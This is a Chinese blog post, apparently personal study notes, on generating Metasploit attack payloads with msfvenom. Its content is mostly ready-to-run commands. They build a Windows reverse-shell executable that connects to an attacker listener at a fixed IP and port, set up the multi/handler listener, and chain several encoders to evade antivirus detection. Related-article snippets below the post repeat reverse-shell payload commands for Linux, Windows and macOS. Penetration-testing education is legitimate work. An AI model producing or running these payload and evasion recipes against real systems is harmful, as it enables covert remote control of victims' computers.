MSF攻击载荷的生成

最新推荐文章于 2024-07-17 09:45:48 发布
最新推荐文章于 2024-07-17 09:45:48 发布
阅读量1.6k 收藏 10
点赞数
分类专栏: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yanyi3271/article/details/102817725
版权

1、查看该模块的可用参数

msfvenom -p windows/shell_reverse_tcp --list-options
在这里插入图片描述

2、生成攻击载荷

msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -f exe -o payload1.exe
其中:
-f 表示输出格式
-o 表示保存payload为一个文件

在这里插入图片描述
3、接下来在MSF终端启动一个监听器

载入multi/handler模块
设置攻击载荷为windows反弹shell,用来匹配我们先前创建的可执行文件,并指定模块监听的IP地址,以及监听端口
在这里插入图片描述

4、通过MSF编码器躲避杀毒软件的检测
msfvenom --list encoders
显示当前框架中支持的编码器种类
在这里插入图片描述

5、在生成攻击载荷时加入编码器

msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -e x64/xor -f exe -o payload2.exe

通过-e选项,加入编码器
在这里插入图片描述

6、多重编码

msfvenom -p windows/shell_reverse_tcp LHOST=10.180.7.20 LPORT=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a -x86 --platform windows -i 10 -f exe -o payload3.exe在这里插入图片描述

click#15
关注
专栏目录
MSF生成各类攻击载荷
小丁长不胖
07-21 533
Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe Mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.m
msf攻击载荷生成
我还在的博客
10-06 1695
msf攻击载荷生成器0x00 前言0x01 拓扑结构0x02 过程1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 0x00 前言 这是我对 msf攻击载荷生成器的学习记录。 0x01 拓扑结构 0x02 过程 1.使用msf生成木马,启动BackTrack 5 后,msf攻击载荷生成生成木马过程 1.1 显示msfpayload命令的使用方法:msfp...
【网络安全】简单的免杀方法(非常详细)零基础入门到精通,收藏这一篇就够了_免杀加壳工具
2401_84618514的博客
07-17 759
小七免杀工具包里有很多的工具我就列出其中的一些常用的排名不分前后基于最新的kali讲解,循序渐进地对黑客攻防剖析。适合不同层次的粉丝。我希望能为大家提供切实的帮助,讲解通俗易懂,风趣幽默,风格清新活泼,学起来轻松自如,酣畅淋漓!
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 7777
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
关于msfconsole生成攻击载荷(自我小结)
weixin_65106563的博客
02-16 442
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=本机 lport=4444 -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/demo2.exe。(3)设置payload(set payload windows/meterpreter/reverse_tcp)(2)使用监听模块(use exploit/multi/handler)
msf生成攻击载荷进行免杀处理
Solar's Blog
04-30 3699
使用MSF编码器避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器...
MSF攻击载荷生成器是干什么的
最新发布
08-02
这个载荷生成器允许攻击者根据目标系统的架构、操作系统以及安全配置,定制特定环境下的可执行文件。它可以创建木马、病毒、后门等各种类型的程序,以便黑客能够悄悄地控制受害计算机并执行各种非法操作。 MSF的...
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成
weixin_31312621的博客
05-03 1643
本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑标题:Metasploit后门渗透Linux系统以及跨平台后门生成作者:小爱_Joker难度:两级阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。攻击者IP:192.168.0.5受害者IP:192....
云服务器部署msf生成windows木马远程攻击个人主机
CC__Faker的博客
07-01 1964
目录0x01 环境部署0x01 纯净系统安装0x02 安装msf0x02 生成木马0x03 利用msf攻击 0x01 环境部署 我云服务器采用的是阿里云的服务器,自己重装了个纯净系统,建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用阿里云服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 0x01 纯净系统安装 1)安装软件 #Debian/Ubuntu系统: apt-get update apt-get install -y xz-utils openssl gawk fil
metasploit学习之路(三) exploit+payload攻击载荷+metepreter(介绍)
Sea_Sand息禅
07-07 2275
一、exploit介绍 exploit是利用漏洞对目标进行攻击的模块,通过信息的手机及漏洞的验证等,使用相应的exploit对目标机进行漏洞攻击。也就是我么常说的漏洞利用exp。 exploit可有主动和被动两种。 主动:利用合适的exploit对目标机进行攻击 被动:类似于钓鱼,等待用户对我们的诱饵链接等进行操作我们才能攻击成功。 二、payload介绍 payload是msf生成的有效载荷,可...
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7559
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
msfvenom参数总结
Fng的博客
09-19 1160
kali中的msfvenom取代了msfpayload和msfencode,常用于生成木马。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3560
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
msfvenom
weixin_59114667的博客
03-02 158
木马程序格式:jpg exe txt
白帽子学习——Metasploit渗透测试指南
weixin_43487532的博客
09-12 4096
黑客之渗透初学
MSF_PHP后门反弹连接_DVWA文件上传木马_Metasploit配置监控及msfvenom生成攻击载荷
qq_51550750的博客
06-02 976
msf——PHP后门反弹连接
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹
Liu_Bruce的博客
05-09 3801
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的方法(简称为免杀技术)。远程控制被控端也可被看作病毒的一种。 ​ 到目前为止,杀毒软件主要使用了3种技术。如下: 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入病毒库,检测程序时看它是否包含这个特征码。 基于
msfvenom生成各种Payload命令
IT界迷者Blog--
10-17 3158
msfvenom生成各种Payload命令 msfvenom -l 列出所有模块,攻击载荷 Binaries linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值